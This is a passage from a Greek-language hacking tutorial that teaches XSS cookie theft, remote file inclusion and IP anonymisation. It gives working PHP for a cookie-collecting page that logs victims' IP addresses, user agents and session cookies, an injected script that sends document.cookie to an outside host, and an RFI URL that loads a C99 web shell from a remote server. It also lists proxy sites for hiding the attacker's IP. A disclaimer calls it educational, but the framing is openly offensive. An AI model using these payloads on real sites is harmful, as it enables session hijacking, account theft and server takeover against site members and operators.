Αν ο σχεδιαστής της σελίδας περνάει τελείως χύμα τις παραμέτρους τότε αυτό θα το αναγνωρίσει ως κώδικα HTML, και θα εκτελέσει το JavaScript alert() που εμφανίζει ένα pop-up window με την λέξη test μέσα. Αν σε οποιαδήποτε φόρμα ενός site εκτελεστεί αυτό τότε σημαίνει ότι μπορείτε να εκτελέσετε όποιοδήποτε JavaScript κώδικα.

'Ενα παράδειγμα:

Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:

<head><meta http-equiv=”Content-Language” content=”it”><title>Cookies Stealther</title></head>

<body bgcolor=”#C0C0C0″>

<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p><p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p><p align=”left”>&nbsp;</p>

</body>

Page 45: Greek Track

και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:

<?php

$ip = $_SERVER['REMOTE_ADDR'];$referer = $_SERVER['HTTP_REFERER'];$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date(“Y-m-d G:i:s A”);$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer: “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(‘vb.php’ , ‘a’);fwrite($file,$text);fclose($file);header(“Location: http://www.google.com“);

?>

Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.

Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=”http://www.example-of-hosting/documents.php?c=”+document.cookie;</script>

Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php.

Remote File Inclusion (R.F.I) είναι ένας από τους πάρα πολλούς τρόπους για να κάνεις deface ή να πάρεις root σε ένα μηχάνημα, εκμεταλλευόμενος πάντα κάποια “αδυναμία” στον κώδικα (vulnerability).

Η επίθεση με R.F.I. επιτρέπει σε αυτόν που κάνει την επίθεση να τρέξει τον δικό του κώδικα – συνήθως php – (script) στο site στο οποίο έχει τις “αδυναμίες” στον κώδικα.

Ένα παράδειγμα από κώδικα που μπορεί να δεχθεί επίθεση γιατί η μεταβλητή δεν καθορίζεται συγκεκριμένα:(Το παράδειγμα είναι τυπικό και είναι για την συγκεκριμένη περίπτωση του παραδείγματος)

Page 46: Greek Track

include($title . '/archive.php');

και το url:www.vulnerable.website.com/index.php?title=archive.php?

Κάποιος μπορεί να εκμεταλλευτεί την αδυναμία αυτή και να εκτελέσει ένα php script που θα του δώσει την δυνατότητα να εκτελέσει κάποιες εντολές, να ανεβάσει αρχεία (ανάλογα με τα permissions) και γενικά να πάρει πληροφορίες. Tα scripts αυτά είναι γνωστά ως web shells. Tα πιο γνωστά web shells είναι το: c99 και το r57.

O τρόπος με τον οποίο μπορούν να εκτελεστούν είναι ο εξής:

www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.txt?archive.php

Στην θέση του C99.txt θα μπορούσε να είναι οποιοδήποτε αρχείο με κώδικα το οποίο είναι ανεβασμένο σε έναν remote web server. Στο παράδειγμα αυτό ο server είναι: www.malicious.code.com.

Πρέπει να σημειώσουμε πως θα πρέπει ο server στον οποίο είναι ανεβασμένη η σελίδα με τις αδυναμίες στον κώδικα να “επιτρέπει” το R.F.I. γιατί υπάρχουν τρόποι & ρυθμίσεις που αποτρέπουν την εκτέλεση remote αρχείων. Για να βρει κάποιος αδυναμίες σε ένα site, θα πρέπει να έχει λίγες γνώσεις προγραμματισμού και κάποια εργαλεία ανίχνευσης αυτών των αδυναμιών, τα λεγόμενα scanners, που μπορεί να είναι προγράμματα, μηχανές αναζήτησης, ακόμα και bots που τρέχουν σε IRC Servers.

LFI: Όταν η αυτοκρατορία πέφτει από μέσα! Την εποχή των βασιλιάδων και των ιπποτών, τότε που οι μάχες έδιναν κι έπαιρναν και η ασφάλεια του κάστρου έπαιζε σημαντικό ρόλο για την τύχη ολόκληρης της αυτοκρατορίας (ή κάτι τέτοιο, τέλος πάντων), παράλληλα με την ωμή βία γίνονταν και ύπουλες απόπειρες για προσβάσεις στο κάστρο – στόχο. Το πώς, είναι μάλλον προφανές: Πάντα υπήρχε μια κρυφή, ξεχασμένη πόρτα, στην οποία λίγοι έδιναν σημασία. Κι όμως, συχνά οι επιτιθέμενοι την έβρισκαν, με τη συνδρομή κάποιου καλοθελητή από μέσα. Φανταστείτε, τώρα, ένα καλά οχυρωμένο κάστρο, το οποίο όμως κρύβει μέσα τους μαρτυριάρηδες αυλικούς, έτοιμους να προδώσουν τα μυστικά του. Σταματήστε να φαντάζεστε. Παρόμοιες καταστάσεις συναντάμε και σήμερα! Στην τεχνική επιθέσεων RFI (Remote File Inclusion), ό επιτιθέμενος εκτελεί δικό του κώδικα/πρόγραμμα σ΄ ένα απομακρυσμένο site μέσω ενός PHP/ASP shell που φιλοξενείται σε κάποιον άλλο, (δικό του) server. To site-στόχος, χωρίς να έχει τη δυνατότητα να “καταλάβει” ότι πρόκειται για εξωτερική σελίδα, εκτελεί το περιεχόμενό της σαν να ήταν μέρος του. Περιττό να πούμε ότι, στο 99.9878129% των περιπτώσεων, το αποτέλεσμα είναι καταστροφικό!

Page 47: Greek Track

ΑνωνυμίαΥπάρχουν δύο τρόποι για να κρύψουμε την IP μας όταν κάνουμε περιήγηση στο Internet.Ο ένας είναι η χρησιμοποίηση proxy στον browser μας και ο άλλος μέσω κάποιων άλλων ιστοσελίδων που μας δίνουν την δυνατότητα να σερφάρουμε στο Internet ανώνυμα.

Αν λοιπόν δεν μπορούμε να βρούμε κάποιον διαθέσιμο proxy server για να κρατήσουμε την ανωνυμίας μας τότε μπορούμε να χρησιμοποιήσουμε κάποια από τις παρακάτω ιστοσελίδες.Το μόνο που χρειάζεται ουσιαστικά να κάνουμε είναι να βάλουμε την διεύθυνση της σελίδας που θέλουμε να μπούμε στο κενό πεδίο και να αρχίσουμε το σερφάρισμα.

Ιστοσελίδες με Web Based Proxy:

http://proxify.com/

http://htmlblock.co.uk/anonymous_web_browser/

http://www.shadowsurf.com/

http://anonymouse.org/anonwww.html

http://www.guardster.com/subscription/proxy_free.php

http://www.the-cloak.com/login.html

Πρόκεται ουσιαστικά για Web Based Proxy και το πλεονέκτημα που έχουνε είναι ότι δεν χρειάζεται ούτε να εγκαταστήσουμε κάποιο πρόγραμμα στον υπολογιστή μας για ανωνυμία,ούτε και ασφαλώς και να ψάχνουμε για proxy συνέχεια και να χάνουμε χρόνο.

Page 48: Greek Track

Συγχαρητήρια

'Εχεις πλέον φτάσει σε ένα καλό επίπεδο. Παρόλα αυτά πρέπει να εμπλουτίσεις τις γνώσεις σου με καινούριες αλλά και να εξασκήσεις τις ήδη υπάρχουσες. Η γνώση δεν είναι δύναμη. Αποκτά δύναμη μόνο όταν χρησιμοποιηθεί.

Βιβλιογραφία – Πηγές

http://www.undersec.info/ Undersec Forum (No Secrets Here)

http://www.s3cure.gr/ S3cure.Gr

http://txaker.defiant.gr/ Total Xaker Unofficial Blog

http://www.ubuntu-gr.org/ Η ελληνική κοινότητα του Ubuntu

http://earthlab.uoi.gr/indy/hacker-howto-gr/ Πως να γίνεις hacker?

Total Xaker Magazine

The hackers' underground handbook

Όλα τα tutorials αποτελούν εκπαιδευτικό υλικό, και δεν είμαι υπεύθυνος για τον τρόπο χρήσης του καθενός. C4pt41n